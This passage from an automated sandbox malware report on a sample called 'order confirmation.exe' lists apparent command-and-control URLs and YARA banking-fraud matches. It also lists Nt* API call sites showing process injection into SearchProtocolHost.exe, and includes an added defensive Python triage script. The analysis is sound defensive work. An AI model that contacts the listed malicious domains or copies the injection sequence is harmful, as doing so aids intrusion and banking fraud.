cfL4;desc="?proto=TCP&rtt=2211&min_rtt=2211&rtt_var=1105&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=529&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: order confirmation.exe | String found in binary or memory: http://tempuri.org/kviskotekaDbDataSet.xsdcIgra
Source: XDBtzWJieMe.exe, 0000000A.00000002.2823935651.0000000004F06000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ana-silverco.shop
Source: XDBtzWJieMe.exe, 0000000A.00000002.2823935651.0000000004F06000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ana-silverco.shop/eaqq/
Source: SearchProtocolHost.exe, 00000009.00000002.2823206675.0000000004218000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000002.2825358139.00000000062E0000.00000004.00000800.00020000.00000000.sdmp, XDBtzWJieMe.exe, 0000000A.00000002.2822111339.0000000003188000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.canadavinreport.site/4d2l/?2VqtG=K0rLevU0Wh5tIJEp&KX=ZGBp9LUVeZbORoknng5
Source: SearchProtocolHost.exe, 00000009.00000002.2823206675.00000000043AA000.00000004.10000000.00040000.00000000.sdmp, XDBtzWJieMe.exe, 0000000A.00000002.2822111339.000000000331A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.phoenix88.sbs/cgi-sys/suspendedpage.cgi?KX=I9QoqWawalcNSRHc2ItfPod4AkGcs3UgKY9BOPFHD5g/ps
Source: SearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: SearchProtocolHost.exe, 00000009.00000002.2823206675.0000000003EF4000.00000004.10000000.00040000.00000000.sdmp, XDBtzWJieMe.exe, 0000000A.00000002.2822111339.0000000002E64000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2289794618.000000002D134000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://cdn-bj.trafficmanager.net/?h=
Source: SearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: SearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: SearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SearchProtocolHost.exe, 00000009.00000002.2818884774.0000000002F79000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: SearchProtocolHost.exe, 00000009.00000002.2818884774.0000000002F79000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: SearchProtocolHost.exe, 00000009.00000003.2177672053.0000000007D88000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: SearchProtocolHost.exe, 00000009.00000002.2818884774.0000000002F79000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: SearchProtocolHost.exe, 00000009.00000002.2818884774.0000000002F79000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: SearchProtocolHost.exe, 00000009.00000002.2818884774.0000000002F79000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: SearchProtocolHost.exe, 00000009.00000002.2818884774.0000000002F79000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: SearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: SearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

Source: Yara match | File source: 4.2.order confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.order confirmation.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.2823935651.0000000004EB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1983228417.0000000001310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2821333990.0000000003270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2821409903.00000000032C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1982675271.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2820915719.0000000002B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1984356146.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

Source: initial sample | Static PE information: Filename: order confirmation.exe
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0042CAB3 NtClose | 4_2_0042CAB3
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F2B60 NtClose, LdrInitializeThunk | 4_2_013F2B60
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F2DF0 NtQuerySystemInformation, LdrInitializeThunk | 4_2_013F2DF0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F2C70 NtFreeVirtualMemory, LdrInitializeThunk | 4_2_013F2C70
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F35C0 NtCreateMutant, LdrInitializeThunk | 4_2_013F35C0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F4340 NtSetContextThread | 4_2_013F4340
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F4650 NtSuspendThread | 4_2_013F4650
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F2BA0 NtEnumerateValueKey | 4_2_013F2BA0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F2B80 NtQueryInformationFile | 4_2_013F2B80
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F2BF0 NtAllocateVirtualMemory | 4_2_013F2BF0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F2BE0 NtQueryValueKey | 4_2_013F2BE0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F2AB0 NtWaitForSingleObject | 4_2_013F2AB0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F2AF0 NtWriteFile | 4_2_013F2AF0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F2AD0 NtReadFile | 4_2_013F2AD0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F2D30 NtUnmapViewOfSection | 4_2_013F2D30
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F2D10 NtMapViewOfSection | 4_2_013F2D10
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F2D00 NtSetInformationFile | 4_2_013F2D00
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F2DB0 NtEnumerateKey | 4_2_013F2DB0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F2DD0 NtDelayExecution | 4_2_013F2DD0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F2C00 NtQueryInformationProcess | 4_2_013F2C00
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F2C60 NtCreateKey | 4_2_013F2C60
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F2CA0 NtQueryInformationToken | 4_2_013F2CA0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F2CF0 NtOpenProcess | 4_2_013F2CF0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F2CC0 NtQueryVirtualMemory | 4_2_013F2CC0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F2F30 NtCreateSection | 4_2_013F2F30
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F2F60 NtCreateProcessEx | 4_2_013F2F60
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F2FB0 NtResumeThread | 4_2_013F2FB0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F2FA0 NtQuerySection | 4_2_013F2FA0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F2F90 NtProtectVirtualMemory | 4_2_013F2F90
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F2FE0 NtCreateFile | 4_2_013F2FE0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F2E30 NtWriteVirtualMemory | 4_2_013F2E30
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F2EA0 NtAdjustPrivilegesToken | 4_2_013F2EA0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F2E80 NtReadVirtualMemory | 4_2_013F2E80
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F2EE0 NtQueueApcThread | 4_2_013F2EE0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F3010 NtOpenDirectoryObject | 4_2_013F3010
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F3090 NtSetValueKey | 4_2_013F3090
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F39B0 NtGetContextThread | 4_2_013F39B0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F3D10 NtOpenProcessToken | 4_2_013F3D10
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F3D70 NtOpenThread | 4_2_013F3D70
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03554340 NtSetContextThread, LdrInitializeThunk | 9_2_03554340
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03554650 NtSuspendThread, LdrInitializeThunk | 9_2_03554650
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03552B60 NtClose, LdrInitializeThunk | 9_2_03552B60
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03552BF0 NtAllocateVirtualMemory, LdrInitializeThunk | 9_2_03552BF0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03552BE0 NtQueryValueKey, LdrInitializeThunk | 9_2_03552BE0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03552BA0 NtEnumerateValueKey, LdrInitializeThunk | 9_2_03552BA0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03552AD0 NtReadFile, LdrInitializeThunk | 9_2_03552AD0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03552AF0 NtWriteFile, LdrInitializeThunk | 9_2_03552AF0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03552F30 NtCreateSection, LdrInitializeThunk | 9_2_03552F30
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03552FE0 NtCreateFile, LdrInitializeThunk | 9_2_03552FE0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03552FB0 NtResumeThread, LdrInitializeThunk | 9_2_03552FB0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03552EE0 NtQueueApcThread, LdrInitializeThunk | 9_2_03552EE0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03552E80 NtReadVirtualMemory, LdrInitializeThunk | 9_2_03552E80
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03552D10 NtMapViewOfSection, LdrInitializeThunk | 9_2_03552D10
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03552D30 NtUnmapViewOfSection, LdrInitializeThunk | 9_2_03552D30
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03552DD0 NtDelayExecution, LdrInitializeThunk | 9_2_03552DD0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03552DF0 NtQuerySystemInformation, LdrInitializeThunk | 9_2_03552DF0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03552C70 NtFreeVirtualMemory, LdrInitializeThunk | 9_2_03552C70
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03552C60 NtCreateKey, LdrInitializeThunk | 9_2_03552C60
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03552CA0 NtQueryInformationToken, LdrInitializeThunk | 9_2_03552CA0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035535C0 NtCreateMutant, LdrInitializeThunk | 9_2_035535C0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035539B0 NtGetContextThread, LdrInitializeThunk | 9_2_035539B0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03552B80 NtQueryInformationFile | 9_2_03552B80
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03552AB0 NtWaitForSingleObject | 9_2_03552AB0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03552F60 NtCreateProcessEx | 9_2_03552F60
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03552F90 NtProtectVirtualMemory | 9_2_03552F90
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03552FA0 NtQuerySection | 9_2_03552FA0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03552E30 NtWriteVirtualMemory | 9_2_03552E30
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03552EA0 NtAdjustPrivilegesToken | 9_2_03552EA0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03552D00 NtSetInformationFile | 9_2_03552D00
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03552DB0 NtEnumerateKey | 9_2_03552DB0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03552C00 NtQueryInformationProcess | 9_2_03552C00
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03552CC0 NtQueryVirtualMemory | 9_2_03552CC0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03552CF0 NtOpenProcess | 9_2_03552CF0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03553010 NtOpenDirectoryObject | 9_2_03553010
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03553090 NtSetValueKey | 9_2_03553090
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03553D70 NtOpenThread | 9_2_03553D70
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03553D10 NtOpenProcessToken | 9_2_03553D10
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_00A093A0 NtCreateFile | 9_2_00A093A0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_00A09510 NtReadFile | 9_2_00A09510
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_00A096B0 NtClose | 9_2_00A096B0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_00A09610 NtDeleteFile | 9_2_00A09610
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_00A09820 NtAllocateVirtualMemory | 9_2_00A09820
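The Nt* call-site rows above carry more than a list of API names: the same stubs appear once in the unpacked sample (pid 4, addresses 013F2xxx) and once inside SearchProtocolHost.exe (pid 9, addresses 03552xxx), with identical low-order offsets. The Python below is an added triage helper, not part of the Joe Sandbox report or its tooling. It parses rows in the fused "Source: ...Code function: <id> <api>,<id>" shape this page shows (and the separated "Source | Code function | id" shape), then checks whether the shared stubs sit at one constant distance in the two processes, which is what a single copy of a syscall-stub table relocated into another process looks like, and lists which of the section/map/write/context/APC/resume primitives behind the report's injection signatures each process has. The sample rows are excerpted from this section; reading the middle component of an id as an execution "phase" is an assumption about Joe Sandbox's naming.

```python
import re
from collections import defaultdict

# Rows excerpted from the "System Summary" table of this report, in the fused
# form the page extraction produced. An id is <pid>_<phase>_<hex address>;
# calling the middle component "phase" is an assumption about the tool's naming.
ROWS = [
    r"Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2B60 NtClose,LdrInitializeThunk,4_2_013F2B60",
    r"Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2D10 NtMapViewOfSection,4_2_013F2D10",
    r"Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2F30 NtCreateSection,4_2_013F2F30",
    r"Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2E30 NtWriteVirtualMemory,4_2_013F2E30",
    r"Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F4340 NtSetContextThread,4_2_013F4340",
    r"Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2EE0 NtQueueApcThread,4_2_013F2EE0",
    r"Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2FB0 NtResumeThread,4_2_013F2FB0",
    r"Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2FE0 NtCreateFile,4_2_013F2FE0",
    r"Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552B60 NtClose,LdrInitializeThunk,9_2_03552B60",
    r"Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552D10 NtMapViewOfSection,LdrInitializeThunk,9_2_03552D10",
    r"Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552F30 NtCreateSection,LdrInitializeThunk,9_2_03552F30",
    r"Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552E30 NtWriteVirtualMemory,9_2_03552E30",
    r"Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03554340 NtSetContextThread,LdrInitializeThunk,9_2_03554340",
    r"Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552EE0 NtQueueApcThread,LdrInitializeThunk,9_2_03552EE0",
    r"Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552FB0 NtResumeThread,LdrInitializeThunk,9_2_03552FB0",
    r"Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552FE0 NtCreateFile,LdrInitializeThunk,9_2_03552FE0",
    r"Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_00A093A0 NtCreateFile,9_2_00A093A0",
]

# Accepts both the fused form above and a "Source | Code function | id" form.
# The trailing id must repeat the leading one, which is how the row's third
# column is told apart from the API list.
ROW_RE = re.compile(
    r"Source:\s*(?P<source>.+?)\s*\|?\s*Code function:\s*"
    r"(?P<pid>\d+)_(?P<phase>\d+)_(?P<addr>[0-9A-Fa-f]{8})"
    r"\s*(?P<apis>[A-Za-z0-9_,\s]*?)\s*,?\s*\|?\s*"
    r"(?P=pid)_(?P=phase)_(?P=addr)\s*$"
)

def parse_row(line):
    """Split one table row into its source, id components and API list."""
    m = ROW_RE.match(line.strip())
    if not m:
        return None
    apis = [a.strip() for a in m.group("apis").split(",") if a.strip()]
    return {"source": m.group("source").strip(), "pid": int(m.group("pid")),
            "phase": int(m.group("phase")), "addr": int(m.group("addr"), 16),
            "apis": apis}

def nt_sites(rows):
    """{pid: {api: {addr, ...}}} for every Nt* call site found in the rows."""
    sites = defaultdict(lambda: defaultdict(set))
    for line in rows:
        r = parse_row(line)
        if r is None:
            continue
        for api in r["apis"]:
            if api.startswith("Nt"):
                sites[r["pid"]][api].add(r["addr"])
    return sites

def relocation_deltas(sites, pid_a, pid_b):
    """Group the Nt* stubs both processes share by addr_b - addr_a. When most
    stubs fall under one delta, both processes hold the same stub table (same
    bytes, same internal layout) mapped at different base addresses."""
    deltas = defaultdict(set)
    for api in set(sites[pid_a]) & set(sites[pid_b]):
        for a in sites[pid_a][api]:
            for b in sites[pid_b][api]:
                deltas[b - a].add(api)
    return dict(deltas)

INJECTION_PRIMITIVES = frozenset({
    "NtCreateSection", "NtMapViewOfSection", "NtWriteVirtualMemory",
    "NtSetContextThread", "NtQueueApcThread", "NtResumeThread",
})

def injection_primitives(sites, pid):
    """The injection primitives present as Nt* call sites in this process."""
    return INJECTION_PRIMITIVES & set(sites[pid])

if __name__ == "__main__":
    sites = nt_sites(ROWS)
    for delta, apis in sorted(relocation_deltas(sites, 4, 9).items(),
                              key=lambda kv: -len(kv[1])):
        print(f"delta {delta:#x}: {len(apis)} shared stubs {sorted(apis)}")
    for pid in sorted(sites):
        print(f"pid {pid}: {sorted(injection_primitives(sites, pid))}")
```

On these rows every stub shared by pid 4 and pid 9 sits exactly 0x2160000 higher in SearchProtocolHost.exe, so the process did not resolve these calls through its own ntdll export table but received a copy of the sample's stub table along with the injected code; the single outlier is the second NtCreateFile site at 9_2_00A093A0, which lies outside that table. Feed the full row list from a report through nt_sites to extend the check to the remaining pids.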
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 0_2_01744AE0 | 0_2_01744AE0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 0_2_0174DE84 | 0_2_0174DE84
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 0_2_07D8D757 | 0_2_07D8D757
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 0_2_07D8D768 | 0_2_07D8D768
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 0_2_07D8E118 | 0_2_07D8E118
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 0_2_07D8C0C0 | 0_2_07D8C0C0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 0_2_07D88CD0 | 0_2_07D88CD0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 0_2_07D8BC78 | 0_2_07D8BC78
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 0_2_07D8B84E | 0_2_07D8B84E
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 0_2_07D911FC | 0_2_07D911FC
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 0_2_07D98930 | 0_2_07D98930
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 0_2_07D9CD48 | 0_2_07D9CD48
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 0_2_07D92A90 | 0_2_07D92A90
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 0_2_082615F0 | 0_2_082615F0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_00418A93 | 4_2_00418A93
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0042F0D3 | 4_2_0042F0D3
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_004028F0 | 4_2_004028F0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_00403176 | 4_2_00403176
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_00401100 | 4_2_00401100
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_00403180 | 4_2_00403180
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_00410303 | 4_2_00410303
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0040245D | 4_2_0040245D
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_00402460 | 4_2_00402460
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_00416C93 | 4_2_00416C93
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0040E519 | 4_2_0040E519
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_00410523 | 4_2_00410523
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0040E523 | 4_2_0040E523
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0040E667 | 4_2_0040E667
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0040E673 | 4_2_0040E673
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0040E73B | 4_2_0040E73B
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01448158 | 4_2_01448158
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013B0100 | 4_2_013B0100
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0145A118 | 4_2_0145A118
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_014781CC | 4_2_014781CC
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_014801AA | 4_2_014801AA
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_014741A2 | 4_2_014741A2
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01452000 | 4_2_01452000
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0147A352 | 4_2_0147A352
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_014803E6 | 4_2_014803E6
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013CE3F0 | 4_2_013CE3F0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01460274 | 4_2_01460274
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_014402C0 | 4_2_014402C0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C0535 | 4_2_013C0535
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01480591 | 4_2_01480591
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01472446 | 4_2_01472446
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01464420 | 4_2_01464420
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0146E4F6 | 4_2_0146E4F6
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C0770 | 4_2_013C0770
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013E4750 | 4_2_013E4750
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013BC7C0 | 4_2_013BC7C0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013DC6E0 | 4_2_013DC6E0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013D6962 | 4_2_013D6962
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C29A0 | 4_2_013C29A0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0148A9A6 | 4_2_0148A9A6
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C2840 | 4_2_013C2840
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013CA840 | 4_2_013CA840
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013A68B8 | 4_2_013A68B8
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013EE8F0 | 4_2_013EE8F0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0147AB40 | 4_2_0147AB40
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01476BD7 | 4_2_01476BD7
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013BEA80 | 4_2_013BEA80
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013CAD00 | 4_2_013CAD00
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0145CD1F | 4_2_0145CD1F
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013D8DBF | 4_2_013D8DBF
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013BADE0 | 4_2_013BADE0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C0C00 | 4_2_013C0C00
